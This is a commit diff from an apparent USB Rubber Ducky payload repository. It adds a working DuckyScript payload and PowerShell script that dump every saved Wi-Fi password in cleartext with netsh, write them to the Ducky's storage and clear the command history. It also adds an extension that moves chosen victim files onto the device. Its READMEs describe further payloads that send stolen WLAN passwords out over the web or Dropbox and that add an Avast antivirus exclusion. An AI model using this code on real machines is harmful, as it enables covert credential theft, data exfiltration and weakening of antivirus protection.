Compare commits
143 Commits
7868699434
...
f98d4c6bf8
Author | SHA1 | Date |
---|---|---|
ooovenenoso | f98d4c6bf8 | |
Peaks | 6ae414c545 | |
Luu | aeffdbfcbd | |
Luu | 9a5857b2af | |
Luu | aa5afab7ed | |
Luu | f6fb02fe34 | |
Luu | 0bb2f83a10 | |
Luu | 4a6e17773d | |
Luu | 81ae8f0e8c | |
Luu | 554b3066b7 | |
Peaks | 7f56669213 | |
Peaks | 645f1e9fe3 | |
bst04 | 59d4883817 | |
Aleff | 1ea9c8a689 | |
bst04 | b9de56e67d | |
bst04 | 0403e79d70 | |
Peaks | a8c264c752 | |
UberGuidoZ | a18f4561e2 | |
UberGuidoZ | ad644d8849 | |
UberGuidoZ | 8c3110d8f1 | |
UberGuidoZ | a94beb0c75 | |
UberGuidoZ | 467075df68 | |
UberGuidoZ | e3c28b36ee | |
Peaks | 44af31e74b | |
Mavis Coffey | cacb21ad7e | |
Mavis Coffey | 61eb88ab6c | |
Mavis Coffey | 8be0f9a092 | |
Mavis Coffey | 63e0c18618 | |
Mavis Coffey | 81807425f5 | |
Mavis Coffey | 083951025f | |
Mavis Coffey | 1a5aa0bd08 | |
Mavis Coffey | a323fc3281 | |
UberGuidoZ | b2c8194099 | |
UberGuidoZ | 97745c360d | |
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Peaks | 675972662a | |
Luu | 0df3011601 | |
Luu | a81ecd3e64 | |
Luu | c898ed7858 | |
Luu | 15f8f25701 | |
Peaks | adb9af43f8 | |
Aleff | 3cf199170c | |
Peaks | fd272a60f4 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
Aleff | 9f1222ba05 | |
Aleff | d934d9d4de | |
Aleff | f031b928a8 | |
Aleff | bb89731ae2 | |
Aleff | 9c4257edbd | |
Aleff | d3e494fd12 | |
mavisinator30001 | 8073d4d9cd | |
Peaks | 02641718a0 | |
Aleff | 2c84ff499c | |
Peaks | 7883e2bc50 | |
Alessandro Greco | b1fae99ade | |
Alessandro Greco | 52c42dfc10 | |
Alessandro Greco | 6e3f5924c0 | |
Aleff | 71d5eaf378 | |
Alessandro Greco | 1fa6cea874 | |
Aleff | e5254c68a2 | |
Alessandro Greco | d350174b13 | |
Alessandro Greco | 284195f4cd | |
Peaks | 45a1dc0f01 | |
Peaks | 0bebb446fd | |
Aleff | 7749aa95c1 | |
Peaks | 9f5f323a0d | |
Peaks | b697112f2b | |
Peaks | d4e64b9974 | |
Peaks | 29ac81bb31 | |
Peaks | 4e44f6ef84 | |
Peaks | 42a455a7a2 | |
Alessandro Greco | 2ed20404a3 | |
Alessandro Greco | 777d28a254 | |
Alessandro Greco | af77fdb130 | |
Alessandro Greco | 6331122f51 | |
Alessandro Greco | c11425f7fd | |
Alessandro Greco | 60eb65fbbc | |
Aleff | 40da51da72 | |
Peaks | be52f4d1c9 | |
Yeet | 64a7666c12 | |
Yeet | 0e9ea1358b | |
Peaks | ad08ba6e36 | |
Yeet | a1a7310d61 | |
Yeet | 04b71efc9b | |
Yeet | ca6490cc9a | |
Julien M | e4a7876a00 | |
Julien M | f7d2f37def | |
Peaks | d02b817225 | |
Alessandro Greco | 828c60acca | |
Peaks | 404640f615 | |
Alessandro Greco | 9e6b405745 | |
Alessandro Greco | c895160753 | |
Aleff | 2e892e4b0e | |
Aleff | 35fc314e15 | |
Aleff | 203bf15391 | |
Aleff | 76b023efa3 | |
Aleff | dc5c20e7ac | |
Aleff | bf9ec4cfc0 | |
Aleff | 8d3adb90ad | |
Aleff | 7652db1704 | |
Aleff | e595d71ac3 | |
aleff-github | 0bd6624877 | |
Aleff | 40b33c703e | |
ooovenenoso | 009d089d5c | |
ooovenenoso | 72ef26cf5b | |
aleff-github | 81077db152 | |
aleff-github | 22a5428515 | |
aleff-github | 3b2fee98fc | |
aleff-github | a9fb6e98dd | |
aleff-github | da5acc3da0 | |
aleff-github | 899ad2c484 | |
aleff-github | bf1cf5957b | |
aleff-github | 088512fbba | |
Aleff | badf3a7705 | |
aleff-github | b728f4d525 | |
Aleff | c19eca930e | |
aleff-github | 8cd2d9d8b5 | |
Aleff | 826ca00433 | |
aleff-github | 868c86ea30 | |
Aleff | 670d85768a | |
aleff-github | ba821b39d2 | |
Aleff | 7adf46b49d | |
aleff-github | 1bd6172bb7 | |
aleff-github | 3ebbdd8851 | |
aleff-github | c1a67472f5 | |
Aleff | eb254e0d30 | |
aleff-github | ec0979eaf6 | |
aleff-github | 838d032b5b | |
aleff-github | b2a64152dc | |
Aleff | 2f349d93ab | |
Aleff | 07b0b4d7b1 | |
aleff-github | 2d8482cb36 | |
aleff-github | 9aa67fa102 | |
Aleff | b4859f9ec6 |
|
@ -0,0 +1,103 @@
|
|||
# Save Files In Rubber Ducky Storage - Windows
|
||||
|
||||
This extension can be used to save one or more files through the USB Rubber Ducky storage without having to copy and paste reused code every time, but standardizing a methodology that avoids errors.
|
||||
|
||||
```
|
||||
How many files do you want to save?
|
||||
|
|
||||
|-- Single File
|
||||
| |
|
||||
| |-- Do you already know the full file path? (e.g., C:\Users\Aleff\Downloads\photo.png)
|
||||
| | |
|
||||
| | |-- Use the SINGLE_FILE version
|
||||
| | | |
|
||||
| | | |-- Set #FLAG_SINGLE_FILE to TRUE
|
||||
| | | |-- Define the file path in #SINGLE_PATH
|
||||
| | |
|
||||
| |-- Don't know the full path but can obtain it at runtime through PowerShell?
|
||||
| | |
|
||||
| | |-- Use the $fileToSavePath variable
|
||||
| | | |
|
||||
| | | |-- Set #FLAG_SINGLE_FILE to TRUE
|
||||
| | | |-- Obtain the file path through PowerShell and assign it to $fileToSavePath
|
||||
|
|
||||
|-- Multiple Files
|
||||
| |
|
||||
| |-- Set the #FLAG_SINGLE_FILE variable to FALSE
|
||||
| | |
|
||||
| | |-- Use an array of strings named $fileToSavePaths to collect the paths of all the files you want to use
|
||||
|
||||
```
|
||||
|
||||
|
||||
## Target Environment
|
||||
|
||||
- **Target**: Windows PowerShell
|
||||
|
||||
## Usage
|
||||
|
||||
Insert this extension when you have one or more files that you want to save via USB Rubber Ducky storage.
|
||||
|
||||
## Configuration
|
||||
|
||||
Before using the extension, you need to configure it by setting certain variables in the DuckyScript payload. Here are the configuration options:
|
||||
|
||||
### Driver Label
|
||||
|
||||
This extension utilizes the 'Get-Volume' command to scan the available volumes on the computer where the command is executed, aiming to detect our USB Rubber Ducky device. Upon detection, the device is selected to serve as a reference, allowing us to perform data saving operations. By default, USB Rubber Duckys are identified by the label 'DUCK'. However, this label can be altered, particularly if we want to keep the operation discreet. If the default label has been changed, it will be necessary to update the #DRIVER_LABEL variable with the correct label.
|
||||
|
||||
### Single File or Multiple Files
|
||||
|
||||
You can choose to send a single file or multiple files. Configure the extension accordingly.
|
||||
|
||||
#### Single File Configuration
|
||||
|
||||
- **Variable**: #FLAG_SINGLE_FILE
|
||||
- **Type**: Boolean (TRUE or FALSE)
|
||||
- **Description**: Set #FLAG_SINGLE_FILE to TRUE if you want to save just one file. In this case, you will need to specify the file path within the #SINGLE_PATH variable. Alternatively, you can acquire the file path at runtime via PowerShell and store it in the $fileToSavePath variable.
|
||||
|
||||
Example in DuckyScript:
|
||||
```DuckyScript
|
||||
DEFINE #FLAG_SINGLE_FILE TRUE
|
||||
DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
|
||||
```
|
||||
|
||||
Example in PowerShell before using the extension:
|
||||
```powershell
|
||||
$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
|
||||
```
|
||||
|
||||
#### Multiple Files Configuration
|
||||
|
||||
- **Variable**: #FLAG_SINGLE_FILE
|
||||
- **Type**: Boolean (TRUE or FALSE)
|
||||
- **Description**: Set #FLAG_SINGLE_FILE to FALSE if you want to save multiple files. In this case, in PowerShell, you will have to create the variable $fileToSavePaths, which is an array of strings containing the list of paths related to the files you want to export.
|
||||
|
||||
Example in PowerShell before using the extension:
|
||||
```powershell
|
||||
$fileToSavePaths = @(
|
||||
"C:\Users\Aleff\Downloads\photo.png",
|
||||
"C:\Users\Aleff\Downloads\document.pdf",
|
||||
"C:\Users\Aleff\Downloads\song.mp3"
|
||||
)
|
||||
```
|
||||
|
||||
**Tips for Working with Arrays in PowerShell:**
|
||||
|
||||
- How to create an array:
|
||||
```powershell
|
||||
$fileToSavePaths = @()
|
||||
```
|
||||
|
||||
- How to add an element to the array:
|
||||
```powershell
|
||||
$fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
|
||||
```
|
||||
|
||||
- How to view the array:
|
||||
```powershell
|
||||
$fileToSavePaths
|
||||
```
|
||||
|
||||
That's it! You can now use this extension with the appropriate configuration to save files via the USB Rubber Ducky storage using the same USB Rubber Ducky.
|
||||
|
|
@ -0,0 +1,68 @@
|
|||
EXTENSION SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Aleff
|
||||
REM_BLOCK Documentation
|
||||
This extension is used to save one or more files through the USB Rubber Ducky storage.
|
||||
|
||||
TARGET:
|
||||
Windows 10/11
|
||||
|
||||
USAGE:
|
||||
Insert this extension when you have one or more files that you want to save in your USB Rubber Ducky.
|
||||
|
||||
CONFIGURATION:
|
||||
Set #DRIVER_LABEL variable with the correct Label of your USB Rubber Ducky considering that the default value is 'DUCK'.
|
||||
|
||||
Set #FLAG_SINGLE_FILE with TRUE if you want to save just one file.
|
||||
In this case you will need to specify the file path within the #SINGLE_PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $fileToSavePath variable to capture this path.
|
||||
i.e. in DuckyScript EXTENSION
|
||||
DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
|
||||
i.e. in PowerShell before extension
|
||||
$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
|
||||
|
||||
Set #FLAG_SINGLE_FILE FALSE if you want to send multiple files.
|
||||
In this case in the PowerShell you will have to create the variable $fileToSavePaths, which is an array of strings that should contain the list of paths related to the files you want to save.
|
||||
i.e. in PowerShell before extension:
|
||||
$fileToSavePaths = @(
|
||||
"C:\Users\Aleff\Downloads\photo.png",
|
||||
"C:\Users\Aleff\Downloads\document.pdf",
|
||||
"C:\Users\Aleff\Downloads\song.mp3"
|
||||
)
|
||||
Some tips:
|
||||
How to create an Array?
|
||||
> $fileToSavePaths = @()
|
||||
How to add an element?
|
||||
> $fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
|
||||
How to see the array?
|
||||
> $fileToSavePaths
|
||||
END_REM
|
||||
REM Settings
|
||||
DEFINE #DRIVER_LABEL DUCK
|
||||
DEFINE #FLAG_SINGLE_FILE FALSE
|
||||
DEFINE #SINGLE_PATH 0
|
||||
|
||||
REM Extension Code
|
||||
FUNCTION SAVE_SINGLE_FILE()
|
||||
IF ( #SINGLE_PATH != 0 ) THEN
|
||||
STRINGLN mv #SINGLE_PATH >> ${m}:\
|
||||
ELSE IF ( #SINGLE_PATH == 0 ) THEN
|
||||
STRINGLN mv ${fileToSavePath} >> ${m}:\
|
||||
END_IF
|
||||
END_FUNCTION
|
||||
|
||||
FUNCTION SAVE_MULTIPLE_FILES()
|
||||
STRINGLN
|
||||
foreach ($fileToSavePath in $fileToSavePaths) {
|
||||
mv ${fileToSavePath} >> ${m}:\
|
||||
}
|
||||
END_STRINGLN
|
||||
END_FUNCTION
|
||||
|
||||
STRINGLN $m=(Get-Volume -FileSystemLabel '#DRIVER_LABEL').DriveLetter;
|
||||
IF_DEFINED_TRUE #FLAG_SINGLE_FILE
|
||||
SAVE_SINGLE_FILE()
|
||||
END_IF_DEFINED
|
||||
IF_NOT_DEFINED_TRUE #FLAG_SINGLE_FILE
|
||||
SAVE_MULTIPLE_FILES()
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
|
@ -19,11 +19,29 @@ Opens a shell, get the WiFi names, get the passwords using nmcli, send the resul
|
|||
* Dropbox Token
|
||||
* Permissions
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Dropbox token
|
||||
* Set the sudo password
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
# Define the volume label you're looking for
|
||||
$targetLabel = "DUCKY"
|
||||
|
||||
# Find the drive letter of the USB drive with the specified label
|
||||
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
|
||||
|
||||
if ($volume) {
|
||||
$driveLetter = $volume.DriveLetter + ":\"
|
||||
$usbPath = "$driveLetter$env:username.txt"
|
||||
$baseDestinationDir = $driveLetter
|
||||
Write-Output "Drive letter found: $driveLetter"
|
||||
} else {
|
||||
Write-Error "Drive with label '$targetLabel' not found."
|
||||
exit
|
||||
}
|
||||
|
||||
# Initialize an array to store all Wi-Fi profiles and their passwords
|
||||
$wifiData = @()
|
||||
|
||||
# Get all Wi-Fi profiles
|
||||
$profiles = netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+'
|
||||
|
||||
foreach ($profile in $profiles) {
|
||||
$wlan = $profile.Matches.Value.Trim()
|
||||
|
||||
# Get the password for the current Wi-Fi profile
|
||||
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
|
||||
$password = if ($passw) { $passw.Matches.Value.Trim() } else { "No Password Found" }
|
||||
|
||||
# Create a custom object with the profile and password information
|
||||
$wifiData += [PSCustomObject]@{
|
||||
Username = $env:username
|
||||
Profile = $wlan
|
||||
Password = $password
|
||||
}
|
||||
}
|
||||
|
||||
# Convert the array of Wi-Fi data to JSON
|
||||
$jsonBody = $wifiData | ConvertTo-Json -Depth 3
|
||||
|
||||
# Save the JSON data to a file on the USB drive
|
||||
$jsonBody | Out-File -FilePath $usbPath -Encoding UTF8
|
||||
|
||||
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
|
||||
|
||||
exit
|
|
@ -0,0 +1,7 @@
|
|||
### Local_WLAN_Borrower
|
||||
This script borrows the wifi passwords on the target system and puts them into a .txt file on the ducky.
|
||||
|
||||
# Setup
|
||||
Firstly, download and place the _1.ps1_ script onto the root of your ducky. Then, you will need to edit the inject.txt file accordingly:
|
||||
On line 57, change "DUCKY" to the label of your USB. On line 59, change 1.ps1 to the name of the PS1 script on your ducky.
|
||||
Inside of the PS1 script, you will need to replace _DUCKY_ on line 2 with the label of your USB.
|
|
@ -0,0 +1,79 @@
|
|||
REM Title: Local_WLAN_Borrower
|
||||
REM Description: Borrows wifi passwords and saves them on the DUCKY
|
||||
REM Author: YEETBOY0330
|
||||
REM Props: Zero_Sploit(DUCKY-WIFI-GRABBER) + Hak5 Team
|
||||
REM Version: 1.0
|
||||
REM Category: Creds
|
||||
REM Target: Windows 10 & 11
|
||||
REM Attackmodes: HID, STORAGE
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
DEFAULTDELAY 20
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM change this to your drive label
|
||||
DEFINE #DRIVE_LABEL DUCKY
|
||||
REM change this to the name of your PS1 script
|
||||
DEFINE #PS1_FILE_NAME 1.ps1
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
REM Initial Delay
|
||||
DELAY 1000
|
||||
REM Opens powershell with script execution enabled
|
||||
GUI r
|
||||
DELAY 700
|
||||
STRINGLN powershell -ExecutionPolicy Bypass
|
||||
DELAY 4000
|
||||
|
||||
REM Gets usb drive letter of #DRIVE_LABEL
|
||||
STRINGLN_POWERSHELL
|
||||
$targetLabel = "#DRIVE_LABEL"
|
||||
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
|
||||
$driveLetter = $volume.DriveLetter + ":"
|
||||
cd $driveletter
|
||||
END_STRINGLN
|
||||
REM Runs powershell script
|
||||
STRINGLN .\#PS1_FILE_NAME
|
||||
|
||||
END_IF
|
|
@ -1,8 +1,8 @@
|
|||
# WLAN Windows Password - BADUSB ✅
|
||||
# WLAN Windows Password
|
||||
|
||||
A script used to stole target WLAN Passwords.
|
||||
|
||||
**Category**: WLAN, Credentials
|
||||
**Category**: Credentials
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -24,3 +24,25 @@ Then it cleans up traces of what you have done after.
|
|||
* Plug in your device
|
||||
* Invoke 2 netsh commands
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
This script can be used to put an arbitrary exception path in the Avast app.
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -22,3 +22,25 @@ DEFINE FULL-PATH example/to/path
|
|||
### Dependencies
|
||||
|
||||
* The target must have **Avast installed** and **configured** on the machine
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM # |
|
|||
REM # Title : Add An Exception To Avast Antivirus |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ########################################################
|
||||
|
|
|
@ -0,0 +1,56 @@
|
|||
# Call Someone On An iPhone
|
||||
|
||||
This script can be used to call someone really fast using an iPhone, so iOS system.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
This script can be used to call someone really fast using an iPhone, so iOS system.
|
||||
|
||||
Open search bar, then open the Phone app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.
|
||||
|
||||
## Dependencies
|
||||
|
||||
* The phone must be unlocked
|
||||
|
||||
## Test
|
||||
|
||||
- iPhone 14
|
||||
- iOS 16.4.1
|
||||
|
||||
## Settings
|
||||
|
||||
- You need to change the name of the application according to the language you have on your phone.
|
||||
|
||||
```DuckyScript
|
||||
[20] DEFINE #PHONE-APP-NAME
|
||||
```
|
||||
|
||||
- You must set the phone number to be called
|
||||
|
||||
```DuckyScript
|
||||
[22] DEFINE #NUMBER example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,32 @@
|
|||
REM ##############################################
|
||||
REM # |
|
||||
REM # Title : Call Someone On An iPhone |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : iPhone |
|
||||
REM # |
|
||||
REM ##############################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - The phone must be unlocked
|
||||
|
||||
REM Tested on:
|
||||
REM - iPhone 14
|
||||
REM - iOS 16.4.1
|
||||
|
||||
REM You need to change the name of the application according to the language you have on your phone.
|
||||
DEFINE #PHONE-APP-NAME example
|
||||
REM You must set the phone number to be called
|
||||
DEFINE #NUMBER example
|
||||
|
||||
GUI SPACE
|
||||
DELAY 300
|
||||
STRING #PHONE-APP-NAME
|
||||
ENTER
|
||||
DELAY 1000
|
||||
BACKSPACE
|
||||
STRING #NUMBER
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -55,3 +55,25 @@ To make it easier to use below you can find the various tested configurations, a
|
|||
```DuckyScript
|
||||
DEFINE #BRANCH example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM # |
|
|||
REM # Title : Change Remote Git Link |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11/Linux |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
|
|
|
@ -26,3 +26,25 @@ Opens a shell, get the network card name, set the new MAC address, erase traces.
|
|||
|
||||
* Set the sudo password
|
||||
* Change as you want the new MAC address
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -17,11 +17,29 @@ Opens a shel, get the network card name, set the network configuration, erase tr
|
|||
|
||||
* Linux Permissions
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the sudo password
|
||||
* Change as you want the network configuration
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,84 @@
|
|||
# Change Github Profile Settings
|
||||
|
||||
This script can be used to edit Github account settings speeding up the editing process.
|
||||
|
||||
The script will run a shell and open the default browser in `https://github.com/settings/profile` and close the powershell. When the page is open go to the profile settings TABing many times.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet connection
|
||||
* Logged in Github
|
||||
* PayloadStudio >= 1.3.1
|
||||
|
||||
### Settings
|
||||
|
||||
- Here you should define the new name
|
||||
|
||||
```DuckyScript
|
||||
[19] DEFINE #NAME example
|
||||
```
|
||||
|
||||
- Here you should define the new Biography
|
||||
|
||||
```DuckyScript
|
||||
[20] DEFINE #BIO example
|
||||
```
|
||||
|
||||
- Here you should define the custom pronouns
|
||||
|
||||
```DuckyScript
|
||||
[21] DEFINE #CUSTOM-PRONOUNS example
|
||||
```
|
||||
|
||||
- Here you should define the new personal website url
|
||||
|
||||
```DuckyScript
|
||||
[22] DEFINE #URL example
|
||||
```
|
||||
|
||||
- Here you should define the new social network links
|
||||
|
||||
```DuckyScript
|
||||
[23] DEFINE #SOCIAL-ACCOUNT-1 example
|
||||
[24] DEFINE #SOCIAL-ACCOUNT-2 example
|
||||
[25] DEFINE #SOCIAL-ACCOUNT-3 example
|
||||
[26] DEFINE #SOCIAL-ACCOUNT-4 example
|
||||
```
|
||||
|
||||
- Here you should define the new company
|
||||
|
||||
```DuckyScript
|
||||
[27] DEFINE #COMPANY example
|
||||
```
|
||||
|
||||
- Here you should define the new location
|
||||
|
||||
```DuckyScript
|
||||
[28] DEFINE #LOCATION example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,108 @@
|
|||
REM_BLOCK
|
||||
###################################################
|
||||
# #
|
||||
# Title : Change Github Profile Settings #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
